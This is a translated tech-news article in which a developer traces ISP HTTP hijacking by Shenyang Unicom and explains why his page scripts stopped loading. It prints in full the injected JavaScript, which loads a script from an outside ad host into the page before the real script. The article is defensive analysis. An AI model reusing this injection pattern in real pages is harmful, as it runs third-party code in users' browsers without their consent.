
How to discover that ISP hijacked HTTP requests

2025-01-18 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 06/03 Report

This article explains in detail how to discover that an ISP is hijacking HTTP requests. The editor thinks it is very practical and shares it here as a reference; I hope you get something out of it.

Editor's note: by analysing the alarm information we provide, a Fundebug customer located a very thorny problem: an ISP hijacking HTTP requests. His analysis process is very interesting, and it also reminds us that we should support HTTPS promptly to ensure the security of our sites.

Recently the business systems have frequently received error emails from the front end.

It was found that a large number of the affected IPs belonged to Shenyang Unicom customers, so it was initially inferred to be HTTP hijacking by the operator.

An on-site inspection found that some of the JS on the page failed to load.

The difference is that the erroring JS has an advertisement script inserted ahead of it.

Check the Network panel to distinguish whether DNS was hijacked.

The IP is correct and matches our server IP, which confirms that it is not DNS hijacking.

Since the Shenyang Unicom problem appeared across a large area, it should be treated as an operator problem (there is no realistic possibility that routers were compromised at that scale).

The returned JS is as follows (reformatted from the minified original; the argument of D.write was stripped on the page):

(function () {
  try {
    var o = 'mmurmurm', D = document;
    // Only run if no element with the marker id exists yet.
    if (!D.getElementById(o)) {
      var j = 'http://yunxiu.f6car.com/kzf6/js/basic/XXX.js',          // the real script URL
          J = j + (~j.indexOf('?') ? '&' : '?') + new Date().getTime(), // with cache-busting timestamp
          M = 'http://pc.quansj.cn/?cid=08',                           // the injected ad script
          C = D.currentScript,
          H = D.getElementsByTagName('head')[0],
          N = function (s, i) {  // append a <script> to <head>, optionally with an id
            var I = D.createElement('script');
            I.type = 'text/javascript';
            if (i) I.id = i;
            I.src = s;
            H.appendChild(I);
          };
      if (self == top) { N(M, o); }  // ad script gets the marker id
      if (!C) {
        // Fallback for browsers without document.currentScript: find ourselves by src.
        C = (function () {
          var S = D.scripts, l = S.length, I = 0;
          for (; I < l; ++I) { if (S[I].src == j) { return S[I]; } }
        })();
      }
      // defer/async: append the real script; otherwise write it synchronously
      // (the argument of D.write was stripped on the page).
      C && ((C.defer || C.async) ? N(J) : D.write(''));
    }
  } catch (e) {}
})();

A reverse search via Whois on the domain name

found that the same registrant has several websites used for advertisement hijacking.

It seems to share its name with a talk-show performer (an apprentice of Zhao Benshan). Surely it's not the same person?

Communication with Shenyang Unicom was fruitless; they refused to admit that there was any hijacking. We are now turning to the Ministry of Industry and Information Technology, though whether that leads to a solution remains to be seen.

There is already an adblock rule for that address on GitHub, which clearly attributes it to Liaoning Unicom.

Looking at the JS again: under normal execution it reaches

C && ((C.defer || C.async) ? N(J) : D.write(''))

The code checks whether defer or async is set on the script element: if so, the JS is loaded asynchronously by appending a script element; if not, it is written directly with document.write (synchronous execution).

That is to say, in theory the JS on our server would still be loaded synchronously, but in fact a large number of the scripts were never loaded into the page.

After some research, it turns out Chrome has a setting (said to be an optimisation introduced in Chrome 55+ (?)) that we could try:

chrome://flags/#disallow-doc-written-script-loads

The details are as follows:

With this data in mind, Chrome, starting with version 55, intervenes on behalf of all users when we detect this known-bad pattern by changing how document.write() is handled in Chrome (See Chrome Status). Specifically Chrome will not execute the script elements injected via document.write() when all of the following conditions are met:

1. The user is on a slow connection, specifically when the user is on 2G. (In the future, the change might be extended to other users on slow connections, such as slow 3G or slow WiFi.)

2. The document.write() is in a top level document. The intervention does not apply to document.written scripts within iframes as they don't block the rendering of the main page.

3. The script in the document.write() is parser-blocking. Scripts with the 'async' or 'defer' attributes will still execute.

4. The script is not hosted on the same site. In other words, Chrome will not intervene for scripts with a matching eTLD+1 (e.g. a script hosted on js.example.org inserted on www.example.org).

5. The script is not already in the browser HTTP cache. Scripts in the cache will not incur a network delay and will still execute.

6. The request for the page is not a reload. Chrome will not intervene if the user triggered a reload and will execute the page as normal.

Third party snippets sometimes use document.write() to load scripts. Fortunately, most third parties provide asynchronous loading alternatives, which allow third party scripts to load without blocking the display of the rest of the content on the page.

It looks like condition 4 is not met in our case, so this explanation is set aside for the time being.

After formatting the code, it became clear: the precondition for loading the JS is that there is no node with id mmurmurm in the page. Otherwise the JS is not loaded at all, i.e. document.write is never executed.

The sad part is that if two or more scripts in our page are hijacked, none of them except the first will be loaded.

So we looked at the JS requests (with their query strings) and found:

Sure enough, the customer's request for commonjs had been hijacked at that time, so a node with id "mmurmurm" already existed in the page, which caused the other hijacked scripts not to load the real JS.

(A further note on the hijacking of our home page.)

It was clearly hijacked as well, this time by Jiangsu broadband (Nanjing Telecom).

This is the end of the article on "how to discover that an ISP hijacked HTTP requests". I hope the above content has been of some help and that you have learned something from it; if you think the article is good, please share it so more people can see it.
